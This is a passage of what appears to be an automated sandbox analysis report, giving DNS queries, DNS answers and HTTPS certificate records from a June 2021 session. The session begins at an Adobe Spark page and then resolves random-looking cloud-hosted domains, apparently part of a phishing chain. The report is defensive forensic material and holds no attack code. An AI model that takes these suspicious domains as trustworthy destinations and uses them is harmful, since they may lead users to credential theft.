                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.099977016 CEST53568818.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.131294966 CEST5364253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST53536428.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.553441048 CEST5566753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.623516083 CEST53556678.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.104893923 CEST5483353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.168873072 CEST53548338.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:53.364530087 CEST6247653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:53.426177025 CEST53624768.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:54.092619896 CEST4970553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:54.156610966 CEST53497058.8.8.8192.168.2.3

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.501697063 CEST192.168.2.38.8.8.80x5c7eStandard query (0)page.adobespark-assets.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.793529034 CEST192.168.2.38.8.8.80x6259Standard query (0)use.typekit.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.395910978 CEST192.168.2.38.8.8.80x42beStandard query (0)s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.511737108 CEST192.168.2.38.8.8.80x547bStandard query (0)p.typekit.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.645037889 CEST192.168.2.38.8.8.80x5929Standard query (0)page.adobespark-assets.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.925647974 CEST192.168.2.38.8.8.80xc010Standard query (0)xinviaoafinabatizx.us-south.cf.appdomain.cloudA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.749238968 CEST192.168.2.38.8.8.80x4e3bStandard query (0)kifot.wancdnapp.pageA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.335987091 CEST192.168.2.38.8.8.80x96fbStandard query (0)rikapcndbn.web.appA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.434787989 CEST192.168.2.38.8.8.80x9d1bStandard query (0)unpkg.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.789433002 CEST192.168.2.38.8.8.80xa525Standard query (0)static.adobelogin.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.620053053 CEST192.168.2.38.8.8.80x3f65Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.650521994 CEST192.168.2.38.8.8.80xc0d2Standard query (0)cdn.cookielaw.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.037878036 CEST192.168.2.38.8.8.80x5fceStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.131294966 CEST192.168.2.38.8.8.80x4bc3Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.104893923 CEST192.168.2.38.8.8.80x5c64Standard query (0)api.demandbase.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:14.191540003 CEST8.8.8.8192.168.2.30xaf97No error (0)spark.adobeprojectm.com13.225.74.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:14.191540003 CEST8.8.8.8192.168.2.30xaf97No error (0)spark.adobeprojectm.com13.225.74.35A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:14.191540003 CEST8.8.8.8192.168.2.30xaf97No error (0)spark.adobeprojectm.com13.225.74.123A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:14.191540003 CEST8.8.8.8192.168.2.30xaf97No error (0)spark.adobeprojectm.com13.225.74.86A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.057204008 CEST8.8.8.8192.168.2.30x1bbNo error (0)spark.adobeprojectm.com13.225.74.123A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.057204008 CEST8.8.8.8192.168.2.30x1bbNo error (0)spark.adobeprojectm.com13.225.74.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.057204008 CEST8.8.8.8192.168.2.30x1bbNo error (0)spark.adobeprojectm.com13.225.74.86A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.057204008 CEST8.8.8.8192.168.2.30x1bbNo error (0)spark.adobeprojectm.com13.225.74.35A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.565608978 CEST8.8.8.8192.168.2.30x5c7eNo error (0)page.adobespark-assets.com13.224.195.109A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.565608978 CEST8.8.8.8192.168.2.30x5c7eNo error (0)page.adobespark-assets.com13.224.195.10A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.565608978 CEST8.8.8.8192.168.2.30x5c7eNo error (0)page.adobespark-assets.com13.224.195.74A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.565608978 CEST8.8.8.8192.168.2.30x5c7eNo error (0)page.adobespark-assets.com13.224.195.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.855024099 CEST8.8.8.8192.168.2.30x6259No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.446257114 CEST8.8.8.8192.168.2.30x42beNo error (0)s3.amazonaws.com52.216.105.77A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.574915886 CEST8.8.8.8192.168.2.30x547bNo error (0)p.typekit.netp.typekit.net-v3.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.707321882 CEST8.8.8.8192.168.2.30x5929No error (0)page.adobespark-assets.com13.224.195.10A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.707321882 CEST8.8.8.8192.168.2.30x5929No error (0)page.adobespark-assets.com13.224.195.109A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.707321882 CEST8.8.8.8192.168.2.30x5929No error (0)page.adobespark-assets.com13.224.195.74A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.707321882 CEST8.8.8.8192.168.2.30x5929No error (0)page.adobespark-assets.com13.224.195.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.993217945 CEST8.8.8.8192.168.2.30xc010No error (0)xinviaoafinabatizx.us-south.cf.appdomain.cloud169.47.124.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.993217945 CEST8.8.8.8192.168.2.30xc010No error (0)xinviaoafinabatizx.us-south.cf.appdomain.cloud169.46.89.154A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.993217945 CEST8.8.8.8192.168.2.30xc010No error (0)xinviaoafinabatizx.us-south.cf.appdomain.cloud169.62.254.82A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.813124895 CEST8.8.8.8192.168.2.30x4e3bNo error (0)kifot.wancdnapp.page172.67.145.59A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.813124895 CEST8.8.8.8192.168.2.30x4e3bNo error (0)kifot.wancdnapp.page104.21.47.62A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.403497934 CEST8.8.8.8192.168.2.30x96fbNo error (0)rikapcndbn.web.app151.101.1.195A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.403497934 CEST8.8.8.8192.168.2.30x96fbNo error (0)rikapcndbn.web.app151.101.65.195A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.499056101 CEST8.8.8.8192.168.2.30x9d1bNo error (0)unpkg.com104.16.123.175A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.499056101 CEST8.8.8.8192.168.2.30x9d1bNo error (0)unpkg.com104.16.122.175A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.499056101 CEST8.8.8.8192.168.2.30x9d1bNo error (0)unpkg.com104.16.126.175A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.499056101 CEST8.8.8.8192.168.2.30x9d1bNo error (0)unpkg.com104.16.125.175A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.499056101 CEST8.8.8.8192.168.2.30x9d1bNo error (0)unpkg.com104.16.124.175A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.852684975 CEST8.8.8.8192.168.2.30xa525No error (0)static.adobelogin.comadobelogin-static.prod.ims.adobejanus.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.852684975 CEST8.8.8.8192.168.2.30xa525No error (0)adobelogin-static.prod.ims.adobejanus.comdd20fzx9mj46f.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.852684975 CEST8.8.8.8192.168.2.30xa525No error (0)dd20fzx9mj46f.cloudfront.net13.224.187.69A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.680588961 CEST8.8.8.8192.168.2.30x3f65No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.712351084 CEST8.8.8.8192.168.2.30xc0d2No error (0)cdn.cookielaw.org104.16.148.64A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.712351084 CEST8.8.8.8192.168.2.30xc0d2No error (0)cdn.cookielaw.org104.16.149.64A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.099977016 CEST8.8.8.8192.168.2.30x5fceNo error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.099977016 CEST8.8.8.8192.168.2.30x5fceNo error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)edge-irl1.demdex.netdcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com63.33.31.50A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.19.195.165A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com18.200.233.208A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.16.73.168A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com34.243.47.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.211.62.226A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.209.141.237A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.195352077 CEST8.8.8.8192.168.2.30x4bc3No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.30.135.179A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.623516083 CEST8.8.8.8192.168.2.30x88a4No error (0)adobe.com.ssl.d1.sc.omtrdc.net15.236.176.210A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.623516083 CEST8.8.8.8192.168.2.30x88a4No error (0)adobe.com.ssl.d1.sc.omtrdc.net15.188.95.229A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.623516083 CEST8.8.8.8192.168.2.30x88a4No error (0)adobe.com.ssl.d1.sc.omtrdc.net13.36.218.177A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.168873072 CEST8.8.8.8192.168.2.30x5c64No error (0)api.demandbase.com13.225.74.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.168873072 CEST8.8.8.8192.168.2.30x5c64No error (0)api.demandbase.com13.225.74.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.168873072 CEST8.8.8.8192.168.2.30x5c64No error (0)api.demandbase.com13.225.74.124A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.168873072 CEST8.8.8.8192.168.2.30x5c64No error (0)api.demandbase.com13.225.74.112A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.177321911 CEST13.225.74.123443192.168.2.349736CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,03faf2df7ab96c36419c31725cb1fa7d6
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.184060097 CEST13.225.74.123443192.168.2.349735CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,03faf2df7ab96c36419c31725cb1fa7d6
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.714442968 CEST13.224.195.109443192.168.2.349741CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.718247890 CEST13.224.195.109443192.168.2.349740CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719372034 CEST13.224.195.109443192.168.2.349739CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.719419956 CEST13.224.195.109443192.168.2.349738CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.721640110 CEST13.224.195.109443192.168.2.349737CN=spark.adobe.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Jun 05 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Jun 10 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.729166985 CEST52.216.105.77443192.168.2.349744CN=s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Aug 04 02:00:00 CEST 2020 Tue Dec 08 13:05:07 CET 2015Mon Aug 09 14:00:00 CEST 2021 Sat May 10 14:00:00 CEST 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,03faf2df7ab96c36419c31725cb1fa7d6
                                                                                                                                                                                                                                                        CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Dec 08 13:05:07 CET 2015Sat May 10 14:00:00 CEST 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.732147932 CEST52.216.105.77443192.168.2.349745CN=s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Aug 04 02:00:00 CEST 2020 Tue Dec 08 13:05:07 CET 2015Mon Aug 09 14:00:00 CEST 2021 Sat May 10 14:00:00 CEST 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,03faf2df7ab96c36419c31725cb1fa7d6
                                                                                                                                                                                                                                                        CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Dec 08 13:05:07 CET 2015Sat May 10 14:00:00 CEST 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.335684061 CEST169.47.124.25443192.168.2.349758CN=*.us-south.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.336956978 CEST169.47.124.25443192.168.2.349759CN=*.us-south.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.908082962 CEST172.67.145.59443192.168.2.349761CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Mar 11 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Mar 11 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.910037041 CEST172.67.145.59443192.168.2.349762CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Mar 11 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Mar 11 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
